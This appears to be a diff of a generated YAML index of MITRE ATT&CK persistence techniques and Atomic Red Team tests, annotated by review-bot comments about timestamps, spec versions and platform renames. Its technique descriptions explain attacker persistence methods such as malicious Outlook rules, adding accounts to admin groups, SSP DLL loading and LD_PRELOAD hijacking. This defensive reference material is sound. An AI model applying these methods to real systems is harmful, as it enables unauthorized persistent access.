- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Outlook Rules
- description: |-
- Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
- Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ url: https://github.com/sensepost/notruler
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_detection: |-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Application Log: Application Log Content'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.011:
technique:
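Review bot: the new T1098.007 block ships with `x_mitre_detection: ''`, `atomic_tests: []` and a single data source (`User Account: User Account Modification`), so the index gains a technique that nothing in this repository exercises; that is acceptable for a technique created on 2024-08-05, but it deserves a follow-up issue for an atomic covering `net localgroup`/`net group` and `usermod` rather than landing silently as an empty entry. Separately, the relocated T1137.005 detection text still reads `PRPR_RULE_MSG_NAME`, which looks like a typo of the MAPI property `PR_RULE_MSG_NAME` (its sibling `PR_RULE_MSG_PROVIDER` is spelled correctly); it is upstream ATT&CK text, so report it there rather than hand-editing the generated index.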
@@ -32959,7 +33393,7 @@ persistence:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
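Review bot: the `modified` timestamp on T1546.011 moves backwards here, from `2022-04-25T14:00:00.188Z` to `2020-11-10T18:29:31.094Z`, and the same regression appears on T1037.002, T1205, T1525, T1547.005 and T1543.004 further down, none of which is re-stamped with `x_mitre_attack_spec_version: 3.2.0` in this patch. That pattern suggests the generator is now reading these older objects from a different source than the live ones; confirm that is intended, because a consumer that compares `modified` to decide whether an entry needs re-syncing will treat these as unchanged or stale.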
@@ -33014,13 +33448,11 @@ persistence:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests: []
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
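Review bot: T1546.011 loses both `spec_version` and `x_mitre_attack_spec_version` in this hunk and gets neither back, unlike the objects elsewhere in the patch that are re-stamped with `x_mitre_attack_spec_version: 3.2.0`; T1525 and T1547.005 below lose both fields the same way. If any tooling keys off `x_mitre_attack_spec_version` to pick a parser or schema, these entries will now fall through, so either keep the 2.1.0 value or make sure the consumer defaults it.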
@@ -33081,9 +33513,9 @@ persistence:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -33092,7 +33524,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests: []
T1037.002:
@@ -33145,7 +33576,7 @@ persistence:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -33166,7 +33597,6 @@ persistence:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests:
- name: Logon Scripts - Mac
@@ -33187,7 +33617,7 @@ persistence:
name: manual
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -33271,11 +33701,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -33288,7 +33717,6 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -33301,7 +33729,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -33331,7 +33758,8 @@ persistence:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests: []
T1525:
@@ -33363,7 +33791,7 @@ persistence:
url: https://github.com/RhinoSecurityLabs/ccat
description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
Retrieved September 12, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:27:49.094Z'
name: Implant Internal Image
description: |-
Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -33385,8 +33813,6 @@ persistence:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.005:
technique:
@@ -33412,7 +33838,7 @@ persistence:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -33438,36 +33864,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -33475,9 +33899,9 @@ persistence:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -33486,21 +33910,22 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
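Review bot: the platform list for T1556.007 drops `Azure AD`, `Google Workspace` and `Office 365` in favour of `Office Suite` and `Identity Provider`, and T1137.005 earlier in the patch makes the same `Office 365` to `Office Suite` swap; any per-platform index or filter that still matches on the old platform strings will silently stop selecting these techniques. Check that the platform-specific index generators map the old names onto the new ones before merging, and call the rename out in the commit message so downstream consumers of the index know to do the same.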
@@ -33540,13 +33965,10 @@ persistence:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -33623,7 +34045,6 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests:
- name: Launch Daemon
@@ -33709,7 +34130,7 @@ persistence:
sudo rm /tmp/T1543_004_atomicredteam.txt
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -33728,6 +34149,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -33735,7 +34157,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -33755,29 +34176,31 @@ persistence:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1505.003:
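Review bot: `spec_version: '2.1'` is dropped from this object and never re-added, while `x_mitre_attack_spec_version` is bumped from 3.1.0 to 3.2.0; please confirm nothing in the index tooling reads `spec_version`, since the same removal repeats for every object in this diff. The rest of the hunk is a reorder of `external_references` plus refreshed Microsoft links (CreateProcess and WinExec now point at learn.microsoft.com with a September 12, 2024 retrieval date), which is fine; note that the `Windows NT Command Shell` entry still carries the 2014 retrieval date and old docs.microsoft.com URL, so only some references were refreshed upstream.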
@@ -33854,12 +34277,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.003
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
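Review bot: the `modified` timestamp for T1078.001 moves forward (2024-03-07 to 2024-10-14), which is the expected direction for a regenerated index; keep this in mind when looking at the later hunks in this file where `modified` moves backwards. The `spec_version: '2.1'` removal for T1505.003 at the top of the hunk follows the same pattern as the other objects and needs no separate action if the tooling is confirmed not to read it.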
@@ -33874,6 +34296,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -33882,18 +34305,18 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
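Review bot: the platform list for T1078.001 drops `Azure AD`, `Office 365` and `Google Workspace` and adds `Office Suite` and `Identity Provider`, with the version bumped 1.3 to 1.4 to match. Any per-platform index (CSV or Markdown) derived from `x_mitre_platforms` should be regenerated in the same change, otherwise the Google Workspace and Office 365 indexes will keep listing a technique whose platforms no longer include them. The inserted `x_mitre_modified_by_ref` line is the same key removed at the bottom of the object in the `-33925` hunk, so that part is key reordering only.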
@@ -33925,9 +34348,6 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests:
- name: Enable Guest Account on macOS
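Review bot: the three keys removed here (`x_mitre_attack_spec_version`, `x_mitre_modified_by_ref`, `spec_version`) were, apart from `spec_version`, already inserted earlier in the same T1078.001 object by the `-33874` and `-33882` hunks, so the net content change is only the loss of `spec_version`. A deterministic key order in the dumper (for example sorting keys, or emitting them in upstream order and documenting that) would keep future regenerations from producing paired remove/add hunks like this one.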
@@ -34010,7 +34430,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests: []
T1546.005:
@@ -34037,7 +34456,7 @@ persistence:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
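Review bot: the `modified` value for T1546.005 moves backwards, from 2021-04-29 to 2020-03-24, which a regeneration from a newer upstream release should not do. The same backwards move appears for T1574.006, T1546.012, T1574.005, T1546.008, T1542.002, T1546.009, T1547.015, Port Knocking and T1556.008 in later hunks, so please confirm which bundle the generator read and whether the previous values were real upstream timestamps (several of the old values share the suspicious `14:00:00.188Z` time). Unrelated to this change but visible in the context lines: the description's `|-` block scalar splits "ctrl+c", "and ctrl+d" and "." onto separate lines, so the rendered text contains hard line breaks mid-sentence; that looks like inline code markup being stripped by the generator and is worth a follow-up.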
@@ -34063,8 +34482,6 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests:
- name: Trap EXIT
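Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed from T1546.005 with no replacement, unlike T1574.008 earlier in the diff, which is updated to 3.2.0. The same unreplaced removal happens for T1546.012, T1574.005, T1542.002, T1546.009, T1547.015 and Port Knocking, and every one of those objects is also the one whose `modified` timestamp goes backwards, which suggests these objects were taken from a different (older) copy than the rest. Please confirm that is intended before merging, since consumers that branch on the ATT&CK spec version will now see no value at all for these techniques.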
@@ -34103,7 +34520,7 @@ persistence:
name: sh
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -34224,7 +34641,6 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests:
- name: Dylib Injection via DYLD_INSERT_LIBRARIES
@@ -34337,7 +34753,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.001
atomic_tests:
- name: Create a user account on a MacOS system
@@ -34436,7 +34851,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests: []
T1098.004:
@@ -34546,7 +34960,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests:
- name: Modify SSH Authorized Keys
@@ -34619,7 +35032,7 @@ persistence:
